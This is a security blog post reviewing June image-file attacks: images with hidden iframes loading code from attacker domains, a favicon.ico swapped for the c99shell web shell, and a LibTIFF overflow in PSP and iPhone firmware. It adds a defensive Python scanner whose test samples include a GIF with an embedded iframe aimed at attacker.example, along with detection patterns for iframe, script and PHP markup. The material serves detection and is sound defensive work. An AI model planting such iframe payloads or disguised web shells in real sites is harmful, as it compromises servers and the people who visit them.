June: A Month of New Image Exploits
Malicious image files were especially prolific in June, and three categories of these events are particularly noteworthy.
Malformed Image Files Launching Iframes
Beginning on June 2 and continuing throughout the month, ScanSafe's zero-day threat detection blocked large numbers of malicious image files (GIF, BMP, and JPG) containing iframes that attempted to load content from goldwindos2000.com and ciudad.com.ar. The malicious image files are predominantly hosted on legitimate websites presumed to have been compromised. In most cases, it appears the attackers replaced actual site images with malicious impostor images. The impostor images display normally, but behind the scenes the iframe embedded in the image attempts to load malcode from the attacker site (as noted, either goldwindos2000.com or ciudad.com.ar in the instances STAT observed).
Interestingly, it appears that Roel Schouwenberg of Kaspersky Labs reported the iframe-loading image problem to Microsoft "quite a long time ago". Allegedly Microsoft declared the behavior a 'feature'. This is more than a little surprising, given the myriad of critical image handling vulnerabilities Windows users have had to grapple with over the years.
These malformed image files launching iframes coincide with a recently reported zero-day cross-frame vulnerability that could allow (among other things) keylogging via iframe manipulation.
Favicon.ico Hiding C99Shell
In gentler times, favicon.ico was simply the image file that displays a custom icon for the visited website in the browser address bar. In these harsher times, multiple compromised sites (including several .edu domains) have unwittingly had their favicon.ico replaced with c99shell, a malicious web shell script that provides backdoor access to and complete control of the Web server.
The shell script includes the following reference string:
powered by Captain Crunch Security Team | http://ccteam.ru
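Both of the cases above share one property a defender can check for: a file served under an image name whose bytes are not purely an image, either because HTML markup (an iframe) has been embedded in an otherwise valid image, or because the "image" (favicon.ico) is really a script with no image header at all. The following scanner is an added example written for this post, not ScanSafe's or STAT's own tooling; it compares each file's leading bytes against the magic numbers expected for its extension and searches the body for markup that has no business inside a binary image. The sample files, including the attacker.example host name, are constructed stand-ins for the June samples, not the actual malicious files.

```python
import re
from typing import Dict, List, NamedTuple

# Magic numbers for the image types named in the post, keyed by file extension.
MAGIC = {
    ".gif": (b"GIF87a", b"GIF89a"),
    ".bmp": (b"BM",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".ico": (b"\x00\x00\x01\x00",),
    ".tif": (b"II*\x00", b"MM\x00*"),
    ".tiff": (b"II*\x00", b"MM\x00*"),
}

# Markup that should never appear inside a legitimate image file.
SUSPICIOUS = [
    (re.compile(rb"<\s*iframe", re.I), "embedded <iframe> tag"),
    (re.compile(rb"<\?php", re.I), "embedded PHP open tag"),
    (re.compile(rb"<\s*script", re.I), "embedded <script> tag"),
]


class Finding(NamedTuple):
    name: str
    reasons: List[str]  # empty list means nothing suspicious was seen


def inspect_image(name: str, data: bytes) -> Finding:
    """Check one file: header matches its extension, and no markup inside."""
    ext = name.lower()[name.rfind("."):] if "." in name else ""
    reasons: List[str] = []
    expected = MAGIC.get(ext)
    if expected is None:
        reasons.append(f"unknown image extension {ext!r}")
    elif not data.startswith(expected):
        reasons.append(f"header does not match {ext} magic bytes")
    for pattern, label in SUSPICIOUS:
        if pattern.search(data):
            reasons.append(label)
    return Finding(name, reasons)


def flagged_files(files: Dict[str, bytes]) -> Dict[str, List[str]]:
    """Return only the files that produced at least one finding."""
    results = {}
    for name, data in files.items():
        finding = inspect_image(name, data)
        if finding.reasons:
            results[name] = finding.reasons
    return results


# Constructed samples (not real captures). The GIF body bytes are a
# placeholder; only the header and embedded markup matter to the checks.
SAMPLES: Dict[str, bytes] = {
    # A clean GIF: valid header, binary body, no markup.
    "logo.gif": b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff;",
    # Valid GIF header with an iframe tag appended, mimicking the impostor
    # images described above (attacker.example is a placeholder host).
    "banner.gif": b"GIF89a\x01\x00\x01\x00\x80\x00\x00;"
                  b'<iframe src="http://attacker.example/" width=0 height=0></iframe>',
    # A favicon.ico that is not an icon at all but a PHP script
    # (a harmless stand-in for a web shell, not c99shell itself).
    "favicon.ico": b"<?php /* constructed stand-in, not a real shell */ echo 'x'; ?>",
}

if __name__ == "__main__":
    for name, reasons in flagged_files(SAMPLES).items():
        print(f"{name}: {'; '.join(reasons)}")
```

Run as-is, the script reports banner.gif for the embedded iframe and favicon.ico for both a missing ICO header and a PHP open tag, while logo.gif passes. The check is deliberately crude: it catches plain-text markup inside an image, which is what the June samples contained, but an attacker who encodes or compresses the payload would evade the string matches, so on a production web root it belongs alongside a comparison of each image against a known-good hash from the deployment.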
iPod/iPhone/Sony PSP Exploit
Also seen in June were malicious TIFF files exploiting the LibTIFF TIFFFindFieldInfo remote buffer overflow, first reported by PSP-Hacks in mid-June. The vulnerability affects Sony PSP (PlayStation Portable) devices running firmware versions 2.0 through 2.8, as well as v1.1.1 of Apple's iPhone and iPod touch.

Mary Landesman